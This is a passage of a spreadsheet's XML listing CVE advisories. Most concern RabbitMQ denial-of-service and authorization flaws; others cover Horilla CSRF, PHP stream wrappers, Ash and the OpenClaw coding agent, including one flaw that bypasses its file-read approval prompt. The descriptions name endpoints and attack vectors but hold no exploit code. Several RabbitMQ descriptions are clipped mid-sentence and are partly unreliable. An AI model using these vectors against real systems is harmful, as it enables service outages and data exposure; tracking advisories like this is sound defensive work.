          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15 and 4.0.22 and 4.1.11 and 4.2.6 and 4.3.1, Atom exhaustion: OAuth2 JWT tag: scope values. extractscopes/1 parses scopes of the form .tag: and calls rabbitdatacoercion:toatom() to convert to a tag atom. The token signature is verified first, so the attacker cannot forge scopes , but in IdP configurations where scope content is user-influenced, each login with a novel tag value leaks one In deployments where users can influence the scopes included in their IdP-issued JWT rabbitmqauthbackendoauth2 enabled IdP permits attacker-influenced scope values in signed tokens. This issue is fixed in versions 3.13.15 and 4.0.22 and 4.1.11 and 4.2.6 and 4.3.1.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66071</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66073</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr">
        <is>
          <t>requests, go, gin</t>
        </is>
      </c>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6, Atom table exhaustion via management API node field. pUT /api/queues/:vhost/:name (and the exchanges and bindings endpoints) accepts a node JSON field. The value goes through rabbitnodes:make → listtoatom with no cluster membership check first. Each unique value permanently leaks one atom. A March 2026 refactoring (ea61ce2563) introduced safe helpers in rabbitmgmtnodes.erl (parsenodename, safeatom, and requirenodename, using binarytoexistingatom) and fixed several callers (QQ replica ops, wmauthattempts, wmnodememoryets, getsortreverse, and rabbitfederationmgmt), but getnode/1 in rabbitmgmtutil.erl:880-885, the primary vector used by directrequest/6, was not Roughly 900K requests crash the VM via systemlimit, and all tenants lose Any user with the management tag and one vhost, the lowest privilege This issue is fixed in versions 3.13.15 and 4.0.20 and 4.1.11 and 4.2.6.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66073</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67411</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.18, 4.0.23, 4.1.14, 4.2.9, and 4.3.3, native MQTT and MQTT over WebSocket behind a trusted PROXY Protocol frontend could lose the proxy-derived client address before the MQTT authentication path checked loopback_users, causing the frontend-to-broker address to be treated as loopback. An attacker who can reach the trusted frontend and has valid credentials for a loopback-restricted account can therefore bypass the source-address restriction; the issue does not bypass password authentication. This issue is fixed in versions 3.13.18, 4.0.23, 4.1.14, 4.2.9, and 4.3.3.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67411</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67412</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 4.3.3, 4.2.9 , 4.1.14, 4.0.24, and 3.13.18, Federation upstream in RabbitMQ skips vhost authorization allowing cross-vhost message access. what the bug lets you do. A policymaker on one vhost reads and drains messages out of another vhost it has no permission on. With the default ack-mode the source messages are consumed (deleted), not copied. Why that should not 1. Federation validates the upstream URI without any vhost-access Cross-vhost message read/drain from a per-vhost policymaker, breaking vhost tenancy This issue is fixed in versions 4.3.3, 4.2.9 , 4.1.14, 4.0.24, and 3.13.18.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67412</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67413</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr">
        <is>
          <t>express, gin</t>
        </is>
      </c>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.0.23, 4.1.14, 4.2.9, and 4.3.3, the optional rabbitmq_jms_topic_exchange plugin's x-jms-topic exchange accepted a client-controlled rjms_erlang_selector binding expression whose LIKE evaluator expanded percent and underscore wildcards into overlapping PCRE fragments. It executed those fragments with raw re:run/3 without match or recursion limits, allowing an authenticated tenant that can bind and publish to consume broker scheduler CPU and deny service with pathological selectors. This issue is fixed in versions 4.0.23, 4.1.14, 4.2.9, and 4.3.3.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67413</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100574</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 contains a server-side request forgery vulnerability in its trusted-host DNS checks. For fetches that use the trusted-host DNS recheck, a trusted hostname that resolves to an unspecified address (0.0.0.0 or ::) bypasses the SSRF destination validation. An attacker who can influence DNS for an allowed hostname can therefore cause a guarded fetch to reach a service bound only to loopback and disclose its response; the practical impact depends on the reachable service and the data it returns. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100574</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67222</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.15, 4.0.20, 4.1.11, and 4.2.6, mechanisms/1 applied list_to_atom/1 to every colon-delimited token in an attacker-controlled auth_mechanism value, permanently consuming Erlang VM atoms and allowing the node to be crashed with a large request. Exploitation requires the Shovel or Federation plugin to be in use, and setting auth_mechanism requires the policymaker tag. This issue is fixed in versions 3.13.15, 4.0.20, 4.1.11, and 4.2.6.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67222</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67227</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.0.22 and 4.1.14 and 4.2.7 and 4.3.1, Atom exhaustion: toatom on global-parameter :name. resourceexists/2 (and the PUT/DELETE handlers) call rabbitdatacoercion:toatom/1 on the :name URL path segment. toatom/1 uses binarytoatom/2 (unsafe). The endpoint requires policymaker (not management, but below A user with the policymaker tag can crash the node by exhausting the atom table via repeated requests to /api/global-parameters/:name with unique :name Management plugin enabled policymaker tag ~1M HTTP. This issue is fixed in versions 4.0.22 and 4.1.14 and 4.2.7 and 4.3.1.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67227</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67415</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.9 and 4.3.3, the Shovel parameter parser converted attacker-controlled runtime parameter values into non-garbage-collected Erlang atoms before bounding them or checking a fixed allowlist. Exploitation requires network access to the Management HTTP API, valid credentials with both the management and policymaker tags, permission to set Shovel runtime parameters on a vhost, and the rabbitmq_shovel and rabbitmq_shovel_management plugins to be enabled. The attacker can exhaust the node-wide atom table and deny service, and malicious parameters are stored durably and reparsed when workers start, so atom pressure can recur after restart without a live attacker connection. This issue is fixed in versions 4.2.9 and 4.3.3.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67415</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86066</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr">
        <is>
          <t>django, go</t>
        </is>
      </c>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>Horilla is an HR and CRM software. Prior to 2.0.0, approve_validate_attendance_request at /attendance/approve-validate-attendance-request/ changes attendance_validated, is_validate_request_approved, approved_by, and related pending-request state through an HTTP GET before calling attendance.save(), so Django does not require CSRF validation for the action. An unauthenticated attacker can cause a logged-in manager with attendance.change_attendance to make a top-level request that carries the manager's SameSite=Lax session cookie, silently approving attendance with the victim's privileges and attributing the approval to the victim in the audit trail. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86066</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91766</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>github, gin</t>
        </is>
      </c>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-522</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>When the http:// stream wrapper follows a redirect it forwards the user-supplied Authorization, Cookie and Proxy-Authorization headers unchanged, even when the redirect target is a different host, a different port, or a downgrade from HTTPS to HTTP. A server that can steer a redirect therefore receives credentials that were only meant for the original origin. This is the same class of issue that libcurl fixed in 7.58.0 ( CVE-2018-1000007 https://github.com/advisories/GHSA-g7x2-hrfp-pv5f ).</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91766</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92842</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>The convert.base64-encode, convert.quoted-printable-encode and convert.quoted-printable-decode stream filters accept a line-break-chars option whose length is tracked separately from the string itself. The filter constructors duplicate the value with pestrdup(), which stops at the first NUL byte, while keeping the original length. When the filter later emits a line break it copies the recorded length out of the truncated allocation, reading past its end and placing adjacent heap bytes into the filter output.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92842</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93477</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-915</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in ash-project ash allows a user to set the value of a private action argument on the bulk destroy and bulk update paths.
Action arguments declared with public?: false are meant to be set only by trusted server-side code (for example via Ash.Changeset.set_private_argument/3) and must not be settable from end-user input. CVE-2026-55736 fixed the non-bulk changeset path to strip private arguments from user-supplied parameter maps, but the bulk destroy and bulk update paths were not covered.
Ash.Actions.Destroy.Bulk.base_changeset/5 and Ash.Actions.Update.Bulk.base_changeset/5 match every key in the caller-supplied parameter map against all of the action's arguments with no public? check, then apply the matches to the base changeset. A caller who can submit parameters to a bulk destroy or bulk update action (for example through AshJsonApi, AshGraphql, or a controller that forwards request parameters to Ash.bulk_destroy/4 or Ash.bulk_update/4) can therefore set any private argument of that action, including one referenced by an arg(...) template in the action's changes or validations. Depending on how the application uses the argument (for example an acting_user_id driving authorization or record ownership, or audit metadata), this can lead to an integrity violation or privilege escalation.
The fix requires public? in the argument matching on both bulk paths; private arguments remain settable server-side via the :private_arguments option.
This issue affects ash: from 2.17.15 before 3.33.11.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93477</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100547</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is a coding agent distributed as the npm package `openclaw`. In affected versions (2026.7.1 through 2026.7.2), alternate but valid `file:` URL spellings supplied over the Agent Client Protocol (ACP) were treated as relative paths and were incorrectly classified as reads scoped to the session working directory. When an operator connected `openclaw acp client` to an untrusted or compromised ACP peer, that peer could request a read of a file outside the session working directory without the approval prompt normally required for that path, resulting in disclosure of local file contents. The demonstrated impact is limited to file confidentiality; mutating and command-capable tool classes are not affected. This issue is fixed in OpenClaw 2026.8.1.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100547</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
